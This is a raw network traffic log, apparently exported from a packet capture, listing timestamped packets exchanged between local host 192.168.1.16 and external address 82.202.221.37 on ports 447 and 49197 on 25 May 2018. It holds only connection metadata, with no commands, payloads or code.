Mai 25, 2018 16:10:02.611434937 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617106915 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617160082 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617189884 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617202997 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617218018 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617311954 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.617338896 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617407084 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617427111 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.617505074 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.617532015 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.619824886 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.619858027 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.619882107 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.620023012 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.620059013 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.636898041 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.636928082 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.637001038 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.637031078 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.639652014 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.639677048 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.639697075 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.639774084 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.639801025 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.648659945 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.648709059 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.648746014 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.648757935 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.648763895 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.648825884 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.648853064 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.650875092 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.651334047 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.651375055 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.651411057 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.651462078 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.681219101 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681245089 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681257963 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681266069 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681273937 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681401014 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681413889 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681458950 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.681478977 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681487083 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681528091 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681634903 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681641102 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681683064 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681845903 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.681860924 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.681869984 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.682430029 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.683907986 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.683944941 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.683959007 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.684124947 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.692208052 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692256927 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692298889 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692326069 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692346096 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692478895 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692490101 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.692501068 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692517042 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692539930 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.692652941 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.694844961 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.694874048 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.694993973 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.700752020 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.728794098 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.728837013 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.729057074 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.737261057 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.737287045 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.737309933 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.737329960 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.737345934 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.737349033 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.737652063 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.737669945 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.740128040 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.740228891 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.740247011 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.750317097 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.750343084 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.751142979 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.751163006 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.753071070 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.753088951 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.755373001 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.755390882 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.763176918 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.763215065 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.763236046 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.763251066 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.763268948 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.763396025 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.763418913 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.763509035 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.763536930 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.765688896 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.765708923 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.765721083 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.765825987 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.765852928 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.789587975 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.789628983 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.789721966 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.789751053 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.792231083 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.792265892 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.792346001 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.792371988 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.801282883 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.801312923 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.801616907 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.801666021 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.803975105 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.803997040 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.804013014 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.804088116 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.804107904 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813146114 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813193083 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813209057 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813220024 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813232899 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813368082 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.813442945 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813469887 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813487053 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.813977003 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.814001083 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.814012051 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.814130068 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.814166069 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.815738916 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.815761089 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.815771103 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.815865040 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.815901041 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.818015099 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.862231016 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.862278938 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.862293005 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.862375021 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.876115084 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.876168966 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.876185894 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.876286030 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.878914118 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.878958941 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.879106998 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.896668911 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.896706104 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.896714926 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.897063971 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.899569988 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.899593115 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.899600029 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.899848938 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.922100067 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922125101 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922135115 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922147989 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922157049 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922245026 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922260046 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922266960 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922377110 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.922395945 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.922893047 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.924604893 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.924623013 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.924631119 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.924742937 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.924751043 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.924757957 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.924767017 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.924773932 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.924865961 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.924887896 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.925334930 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.934895039 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.934921980 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.934936047 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.934948921 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.934969902 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.935041904 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.935061932 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.935157061 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.935182095 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.935298920 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.935318947 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.937444925 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.937463045 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.937542915 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.937566042 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971610069 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971635103 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971653938 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971667051 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971677065 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971702099 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.971730947 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971822023 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971839905 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.971945047 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.971968889 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972562075 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972583055 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972593069 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972656012 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.972680092 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972701073 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972719908 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972732067 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972745895 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972754955 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.972853899 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.972877026 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995605946 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995636940 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995644093 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995655060 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995666981 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995773077 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.995800972 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995822906 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995840073 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.995898962 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.995915890 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.998275995 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.998296022 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.998310089 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:02.998394012 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:02.998415947 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020529032 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020559072 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020570040 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020608902 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020618916 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020685911 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.020701885 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020730972 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020747900 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.020800114 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.021567106 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.021584988 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.021591902 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.021641970 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.021665096 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.023176908 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.023196936 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.023272038 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.023296118 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.032728910 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.032757044 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.032810926 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.032835960 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056078911 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056108952 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056117058 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056143045 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056159973 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056195021 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.056224108 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056245089 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056271076 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.056355000 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.056374073 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.058723927 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.058743000 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.058800936 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.058820963 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080219030 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080250025 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080260038 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080269098 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080316067 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.080337048 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080395937 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080409050 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080466032 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.080480099 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080954075 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080971003 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.080981970 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.081026077 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.081043959 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.081059933 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.081074953 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.081124067 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.081139088 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.082884073 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.082901001 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.082962036 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.082978010 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.101475954 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.106334925 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.106360912 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.106379986 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.106414080 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.109132051 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.109162092 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.109268904 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.109292030 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.169981003 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.170012951 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.170113087 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.170135021 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.181094885 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.181126118 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.181149960 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.181171894 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.181181908 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.181190968 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.181210995 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.181287050 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.181303978 MESZ	447	49197	82.202.221.37	192.168.1.16
